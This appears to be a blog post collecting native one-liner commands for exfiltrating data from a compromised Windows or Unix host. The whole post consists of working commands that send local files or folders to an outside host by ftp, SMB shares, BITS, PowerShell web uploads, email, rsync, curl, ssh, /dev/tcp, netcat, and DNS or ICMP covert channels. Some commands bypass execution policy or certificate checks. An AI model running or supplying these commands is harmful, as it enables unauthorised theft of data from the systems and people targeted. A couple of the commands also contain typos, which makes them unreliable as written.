Native / Noninteractive Exfiltration Ideas

Pulled the following from various resources (big shoutout to commandlinekungfu.com), a collection of one liners and non-interactive commands to exfiltrate data when all you have is a shell.  Note, with the windows powershell commands, if you have too many quotations and it breaks the statements try encoding your statements as base64, then executing them using -encodedCommand. If you can't go interactive you can try writing each line of the activity to a file, then calling that file as input to your executable, for example this works well for interactive ftp.  Make sure to stop back overtime as this page is a work in progress.  Enjoy and add your best exfiltration tips in the comments!

On Windows:

Using ftp (like the link above):
echo open remotehost.com 8443 > ftp.dat; echo user myuser>> ftp.dat; echo password1>> ftp.dat; echo bin>> ftp.dat; echo put localfile.txt>> ftp.dat; echo quit>> ftp.dat; ftp -n -s:ftp.dat

Using a windows share:

net use * \\remotehost.com\myshare password1 /user:myuser

Using powershell and BITS to upload to an IIS server:

powershell -noprofile -noninteractive -executionpolicy bypass -command import-module bitstransfer; start-bitstransfer -displayname BITS -source "localfile.txt" -destination http://remotehost.com/serverdir/remotefile.txt -transfertype upload

Powershell upload to a webserver:
powershell -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $server="""http://remotehost.com/serverdir"""; $filepath="""C:\master.zip"""; $http = new-object System.Net.WebClient; $response = $http.UploadFile($server,$filepath);"

Using powershell to send an email:
powershell -noprofile -noninteractive Sent-MailMessage -to "emailaddress"  -from "emailaddress" -subject "Subject" -a "attachment file path" -body "Body" -SmtpServer remotehost.com

Using powershell to send over dns queries:
powershell -executionpolicy bypass "Get-Content "localfile.txt" | ForEach-Object { nslookup $_ remotehost.com }"

On *nix:

With rsync:

rsync -aH localhost remotehost.com:/path/name

Curl over ftp:

curl -T localfile.txt ftp://remotehost.com --user myuser:password1

Tar to ssh:

tar zcf - localfolder | ssh myuser:password1@remotehost.com "cd /path/name; tar zxpf -"

Tar to curl over https:
tar zcf - localfolder | curl -F "data=@-" https://remotehost.com/script.php

Tar to base 64 to a network pipe:
tar zcf - localfolder | base 64 >/dev/tcp/remotehost.com/8443

Tar to dns queries:
tar zcf - localfolder | xxd -p -c 16 | while read line; do host $line.domain.com remotehost.com; done

Raw to dns queries:
LINE=`cat localfile.txt`; domain="remotehost.com";while read -r -n 1 char;do var+=$(printf "%X" \'$char\');done<<<$LINE;b=0;e=60;l=${#var};while [ $b -lt $l ];do >& /dev/udp/$RANDOM.$b."${var:$b:$e}".$domain/53 0>&1;let b=b+60;done;>& /dev/udp/$RANDOM.theend.$domain/53 0>&1;unset var;unset var2

Tar to data over icmp:
tar zcf - localfolder | xxd -p -c 16 | while read line; do ping -p $line -c 1 -q remotehost.com; done

NetCat over random port:
cat localfile.txt | nc remotehost.com 8443